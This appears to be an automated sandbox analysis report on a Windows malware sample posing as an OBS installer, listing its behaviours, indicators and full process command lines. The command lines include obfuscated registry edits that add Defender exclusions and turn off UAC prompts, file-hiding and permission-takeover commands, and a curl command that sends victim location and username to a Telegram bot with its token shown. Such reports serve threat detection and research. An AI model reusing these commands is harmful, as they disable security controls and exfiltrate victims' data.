Resubmissions
25-01-2023 07:44
230125-jktlcaha3x 10Analysis
-
max time kernel
150s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2023 07:44
Static task
static1
Behavioral task
behavioral1
Sample
t2_sup5.exe
Resource
win7-20220812-en
General
-
Target
t2_sup5.exe
-
Size
23.2MB
-
MD5
0c952979e2d76f8ec17ff34a8023b82b
-
SHA1
7406c03065315f5dd6d84e9443c2f0e92a666c0a
-
SHA256
615beea238930be9e92faf8e7394d59d65000beb9728bb8b38f6b31c83e435e8
-
SHA512
6f6cb2e2606602a74a554b610c4baeb0fb6fe8b310429be330e08e6f1102ea95f36fc80fd981402e40fef652a1da5909eeb154cd4dcbd841bdbf9a0a1834278b
-
SSDEEP
393216:RXZVmGOIszfE1/giQkQJ/y2OFsaetMhSEiCjjngIlGZi4zym8nmjKAO9wV3ajcv1:NOm/giQP/yWaeiSEikjnRYjzMmW99IFP
Malware Config
Signatures
-
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\software\microsoft\windows defender security center\notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications\disableenhancednotifications = "1" reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
Processes:
svchost.exedescription pid process target process PID 4184 created 2724 4184 svchost.exe r.exe PID 4184 created 3900 4184 svchost.exe r.exe PID 4184 created 748 4184 svchost.exe r.exe PID 4184 created 3392 4184 svchost.exe r.exe PID 4184 created 1876 4184 svchost.exe obs64.exe PID 4184 created 1004 4184 svchost.exe r.exe PID 4184 created 4856 4184 svchost.exe r.exe PID 4184 created 3608 4184 svchost.exe r.exe PID 4184 created 4160 4184 svchost.exe r.exe PID 4184 created 4956 4184 svchost.exe r.exe -
Processes:
reg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioruser = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" reg.exe -
Processes:
reg.eXereG.exereg.eXereG.eXereg.eXedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCLUSIOns\extensions reg.eXe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCLUSIOns\extensions\dLl = "0" reg.eXe Key created \REGISTRY\MACHINE\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns reG.exe Key created \REGISTRY\MACHINE\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS reg.eXe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCLUSIOns\PathS\C:\Windows\sYSTeM32\drIvers\etC\hOsts = "0" reg.eXe Key created \REGISTRY\MACHINE\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions reg.eXe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCLUSIOns\extensions\sCr = "0" reG.exe Key created \REGISTRY\MACHINE\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs reG.eXe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCLUSIOns\extensions\cMd = "0" reG.eXe Key created \REGISTRY\MACHINE\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns reg.eXe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCLUSIOns\extensions\exe = "0" reg.eXe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables use of System Restore points 1 TTPs
-
Executes dropped EXE 23 IoCs
Processes:
t2_sup5.tmpt2_sup5.tmpr.exer.exer.exer.exer.exeobs64.exer.exer.exer.exer.exer.exer.exer.exer.exer.exeobs64.exeobs64.tmpobs64.tmpobs64.scrobs64.sCrpid process 4592 t2_sup5.tmp 4752 t2_sup5.tmp 2724 r.exe 3900 r.exe 748 r.exe 3240 r.exe 3392 r.exe 1876 obs64.exe 3560 r.exe 1004 r.exe 4856 r.exe 3704 r.exe 3608 r.exe 4160 r.exe 1712 r.exe 4956 r.exe 3480 r.exe 3516 obs64.exe 4308 obs64.tmp 1876 obs64.exe 1284 obs64.tmp 3552 obs64.scr 2180 obs64.sCr -
Possible privilege escalation attempt 5 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 3352 icacls.exe 3268 icacls.exe 4684 takeown.exe 4728 icacls.exe 3268 icacls.exe -
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 4032 attrib.exe 4352 attrib.exe 2424 attrib.exe 3148 attrib.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
t2_sup5.tmpobs64.tmpobs64.sCrdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation t2_sup5.tmp Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation obs64.tmp Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation obs64.sCr -
Drops startup file 1 IoCs
Processes:
t2_sup5.tmpdescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\obs.lnk t2_sup5.tmp -
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 3676 rundll32.exe 2064 rundll32.exe -
Modifies file permissions 1 TTPs 5 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 3268 icacls.exe 3352 icacls.exe 4684 takeown.exe 4728 icacls.exe 3268 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 11 ipINFO.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
Processes:
rundll32.exeobs64.scrpid process 2064 rundll32.exe 2064 rundll32.exe 3552 obs64.scr 3552 obs64.scr 3552 obs64.scr 3552 obs64.scr -
Suspicious use of SetThreadContext 1 IoCs
Processes:
obs64.scrdescription pid process target process PID 3552 set thread context of 2180 3552 obs64.scr obs64.sCr -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3020 vssadmin.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 3304 taskkill.exe 2960 taskkill.exe 1264 taskkill.exe -
Modifies data under HKEY_USERS 25 IoCs
Processes:
r.exer.exer.exer.exer.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" r.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ r.exe -
Suspicious behavior: EnumeratesProcesses 56 IoCs
Processes:
t2_sup5.tmprundll32.exer.exer.exer.exer.exeobs64.exer.exer.exer.exer.exer.exeobs64.tmpobs64.scrpowershell.exepowershell.exepid process 4752 t2_sup5.tmp 4752 t2_sup5.tmp 2064 rundll32.exe 2064 rundll32.exe 2064 rundll32.exe 2064 rundll32.exe 2724 r.exe 2724 r.exe 2724 r.exe 2724 r.exe 3900 r.exe 3900 r.exe 3900 r.exe 3900 r.exe 748 r.exe 748 r.exe 748 r.exe 748 r.exe 3392 r.exe 3392 r.exe 3392 r.exe 3392 r.exe 1876 obs64.exe 1876 obs64.exe 1876 obs64.exe 1876 obs64.exe 1004 r.exe 1004 r.exe 1004 r.exe 1004 r.exe 4856 r.exe 4856 r.exe 4856 r.exe 4856 r.exe 3608 r.exe 3608 r.exe 3608 r.exe 3608 r.exe 4160 r.exe 4160 r.exe 4160 r.exe 4160 r.exe 4956 r.exe 4956 r.exe 4956 r.exe 4956 r.exe 1284 obs64.tmp 1284 obs64.tmp 3552 obs64.scr 3552 obs64.scr 3552 obs64.scr 3552 obs64.scr 4836 powershell.exe 4836 powershell.exe 3304 powershell.exe 3304 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
taskkill.exer.exesvchost.exetakeown.exetaskkill.exer.exer.exer.exeobs64.exer.exer.exer.exer.exer.exevssvc.exetaskkill.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1264 taskkill.exe Token: SeDebugPrivilege 2724 r.exe Token: SeAssignPrimaryTokenPrivilege 2724 r.exe Token: SeIncreaseQuotaPrivilege 2724 r.exe Token: 0 2724 r.exe Token: SeTcbPrivilege 4184 svchost.exe Token: SeTcbPrivilege 4184 svchost.exe Token: SeTakeOwnershipPrivilege 4684 takeown.exe Token: SeDebugPrivilege 3304 taskkill.exe Token: SeDebugPrivilege 3900 r.exe Token: SeAssignPrimaryTokenPrivilege 3900 r.exe Token: SeIncreaseQuotaPrivilege 3900 r.exe Token: SeDebugPrivilege 748 r.exe Token: SeAssignPrimaryTokenPrivilege 748 r.exe Token: SeIncreaseQuotaPrivilege 748 r.exe Token: 0 748 r.exe Token: SeDebugPrivilege 3392 r.exe Token: SeAssignPrimaryTokenPrivilege 3392 r.exe Token: SeIncreaseQuotaPrivilege 3392 r.exe Token: SeDebugPrivilege 1876 obs64.exe Token: SeAssignPrimaryTokenPrivilege 1876 obs64.exe Token: SeIncreaseQuotaPrivilege 1876 obs64.exe Token: 0 1876 obs64.exe Token: SeDebugPrivilege 1004 r.exe Token: SeAssignPrimaryTokenPrivilege 1004 r.exe Token: SeIncreaseQuotaPrivilege 1004 r.exe Token: SeDebugPrivilege 4856 r.exe Token: SeAssignPrimaryTokenPrivilege 4856 r.exe Token: SeIncreaseQuotaPrivilege 4856 r.exe Token: 0 4856 r.exe Token: SeDebugPrivilege 3608 r.exe Token: SeAssignPrimaryTokenPrivilege 3608 r.exe Token: SeIncreaseQuotaPrivilege 3608 r.exe Token: SeDebugPrivilege 4160 r.exe Token: SeAssignPrimaryTokenPrivilege 4160 r.exe Token: SeIncreaseQuotaPrivilege 4160 r.exe Token: 0 4160 r.exe Token: SeDebugPrivilege 4956 r.exe Token: SeAssignPrimaryTokenPrivilege 4956 r.exe Token: SeIncreaseQuotaPrivilege 4956 r.exe Token: SeBackupPrivilege 3896 vssvc.exe Token: SeRestorePrivilege 3896 vssvc.exe Token: SeAuditPrivilege 3896 vssvc.exe Token: SeDebugPrivilege 2960 taskkill.exe Token: SeDebugPrivilege 4836 powershell.exe Token: SeDebugPrivilege 3304 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
t2_sup5.tmpobs64.tmppid process 4752 t2_sup5.tmp 1284 obs64.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
obs64.scrpid process 3552 obs64.scr -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
t2_sup5.exet2_sup5.tmpcmd.exet2_sup5.exet2_sup5.tmprundll32.exereg.eXecmd.execmd.exesvchost.exedescription pid process target process PID 4952 wrote to memory of 4592 4952 t2_sup5.exe t2_sup5.tmp PID 4952 wrote to memory of 4592 4952 t2_sup5.exe t2_sup5.tmp PID 4952 wrote to memory of 4592 4952 t2_sup5.exe t2_sup5.tmp PID 4592 wrote to memory of 3408 4592 t2_sup5.tmp cmd.exe PID 4592 wrote to memory of 3408 4592 t2_sup5.tmp cmd.exe PID 4592 wrote to memory of 3408 4592 t2_sup5.tmp cmd.exe PID 4592 wrote to memory of 5096 4592 t2_sup5.tmp t2_sup5.exe PID 4592 wrote to memory of 5096 4592 t2_sup5.tmp t2_sup5.exe PID 4592 wrote to memory of 5096 4592 t2_sup5.tmp t2_sup5.exe PID 3408 wrote to memory of 1264 3408 cmd.exe taskkill.exe PID 3408 wrote to memory of 1264 3408 cmd.exe taskkill.exe PID 3408 wrote to memory of 1264 3408 cmd.exe taskkill.exe PID 5096 wrote to memory of 4752 5096 t2_sup5.exe t2_sup5.tmp PID 5096 wrote to memory of 4752 5096 t2_sup5.exe t2_sup5.tmp PID 5096 wrote to memory of 4752 5096 t2_sup5.exe t2_sup5.tmp PID 4752 wrote to memory of 3676 4752 t2_sup5.tmp rundll32.exe PID 4752 wrote to memory of 3676 4752 t2_sup5.tmp rundll32.exe PID 4752 wrote to memory of 3676 4752 t2_sup5.tmp rundll32.exe PID 3676 wrote to memory of 2064 3676 rundll32.exe rundll32.exe PID 3676 wrote to memory of 2064 3676 rundll32.exe rundll32.exe PID 4752 wrote to memory of 4440 4752 t2_sup5.tmp cmd.exe PID 4752 wrote to memory of 4440 4752 t2_sup5.tmp cmd.exe PID 4752 wrote to memory of 4440 4752 t2_sup5.tmp cmd.exe PID 3968 wrote to memory of 376 3968 reg.eXe cmd.exe PID 3968 wrote to memory of 376 3968 reg.eXe cmd.exe PID 4440 wrote to memory of 2724 4440 cmd.exe r.exe PID 4440 wrote to memory of 2724 4440 cmd.exe r.exe PID 4440 wrote to memory of 2724 4440 cmd.exe r.exe PID 376 wrote to memory of 5000 376 cmd.exe reg.exe PID 376 wrote to memory of 5000 376 cmd.exe reg.exe PID 376 wrote to memory of 1828 376 cmd.exe reg.exe PID 376 wrote to memory of 1828 376 cmd.exe reg.exe PID 376 wrote to memory of 372 376 cmd.exe reg.exe PID 376 wrote to memory of 372 376 cmd.exe reg.exe PID 376 wrote to memory of 4040 376 cmd.exe reg.exe PID 376 wrote to memory of 4040 376 cmd.exe reg.exe PID 376 wrote to memory of 1916 376 cmd.exe reg.exe PID 376 wrote to memory of 1916 376 cmd.exe reg.exe PID 376 wrote to memory of 3564 376 cmd.exe reg.exe PID 376 wrote to memory of 3564 376 cmd.exe reg.exe PID 376 wrote to memory of 1988 376 cmd.exe reg.exe PID 376 wrote to memory of 1988 376 cmd.exe reg.exe PID 376 wrote to memory of 4684 376 cmd.exe takeown.exe PID 376 wrote to memory of 4684 376 cmd.exe takeown.exe PID 376 wrote to memory of 3268 376 cmd.exe icacls.exe PID 376 wrote to memory of 3268 376 cmd.exe icacls.exe PID 376 wrote to memory of 3304 376 cmd.exe taskkill.exe PID 376 wrote to memory of 3304 376 cmd.exe taskkill.exe PID 4184 wrote to memory of 3900 4184 svchost.exe r.exe PID 4184 wrote to memory of 3900 4184 svchost.exe r.exe PID 4184 wrote to memory of 3900 4184 svchost.exe r.exe PID 376 wrote to memory of 3352 376 cmd.exe icacls.exe PID 376 wrote to memory of 3352 376 cmd.exe icacls.exe PID 4440 wrote to memory of 748 4440 cmd.exe r.exe PID 4440 wrote to memory of 748 4440 cmd.exe r.exe PID 4440 wrote to memory of 748 4440 cmd.exe r.exe PID 376 wrote to memory of 4176 376 cmd.exe reg.exe PID 376 wrote to memory of 4176 376 cmd.exe reg.exe PID 376 wrote to memory of 3828 376 cmd.exe reg.exe PID 376 wrote to memory of 3828 376 cmd.exe reg.exe PID 376 wrote to memory of 984 376 cmd.exe reg.exe PID 376 wrote to memory of 984 376 cmd.exe reg.exe PID 4184 wrote to memory of 3240 4184 svchost.exe r.exe PID 4184 wrote to memory of 3240 4184 svchost.exe r.exe -
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 4352 attrib.exe 2424 attrib.exe 3148 attrib.exe 4032 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe"C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-5S8O5.tmp\t2_sup5.tmp"C:\Users\Admin\AppData\Local\Temp\is-5S8O5.tmp\t2_sup5.tmp" /SL5="$A0046,23846420,160256,C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im obs64.scr4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe"C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe" /verysilent /sp-3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-N7AH8.tmp\t2_sup5.tmp"C:\Users\Admin\AppData\Local\Temp\is-N7AH8.tmp\t2_sup5.tmp" /SL5="$B0044,23846420,160256,C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe" /verysilent /sp-4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby6⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\.cmd""5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exer.exe /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /TI/ /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reG.eXe"C:\Windows\system32\reG.eXe" add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exer.eXe /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /TI/ /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.eXe"C:\Windows\system32\reg.eXe" Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exer.exe /Sw:0 reg.eXe add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /Sw:0 reg.eXe add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /TI/ /Sw:0 reg.eXe add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.eXe"C:\Windows\system32\reg.eXe" add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F9⤵
- Windows security bypass
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\g.cmd""5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cUrL -s ipINFO.io/Ip6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cuRL -s IPINfo.Io/city6⤵
-
C:\Windows\SysWOW64\curl.execuRL -s IPINfo.Io/city7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cUrl -s IPiNfo.io/country6⤵
-
C:\Windows\SysWOW64\curl.execUrl -s IPiNfo.io/country7⤵
-
C:\Windows\SysWOW64\curl.execurl -s -k -d chat_id=1476438440 --data-urlencode "text=Sup5 (21.01.23), File Name: "t2_sup5.exe", IP: 154.61.71.51, Country: NL, City: Aalsmeerderbrug, UserName: Admin, Date: Wed 01/25/2023, 7:44:26" "https://api.telegram.org/bot5705253590:AAFVFnRR0s9sfoSDjSj6MrjbXJ5e1ipXBUM/sendmessage"6⤵
-
C:\Windows\SysWOW64\attrib.exeAttrIb +s +H C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.cmD6⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeAttrIB +s +h C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.vbs6⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\tmp\obs64.exe"C:\tmp\obs64.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-0EB53.tmp\obs64.tmp"C:\Users\Admin\AppData\Local\Temp\is-0EB53.tmp\obs64.tmp" /SL5="$301CC,16149264,140800,C:\tmp\obs64.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\tmp\obs64.exe"C:\tmp\obs64.exe" /verysilent /sp-7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-HFMFA.tmp\obs64.tmp"C:\Users\Admin\AppData\Local\Temp\is-HFMFA.tmp\obs64.tmp" /SL5="$401CC,16149264,140800,C:\tmp\obs64.exe" /verysilent /sp-8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\tmp\obs64.scr"C:\tmp\obs64.scr"9⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\tmp\obs64.sCr"C:\tmp\obs64.sCr"10⤵
- Executes dropped EXE
- Checks computer location settings
-
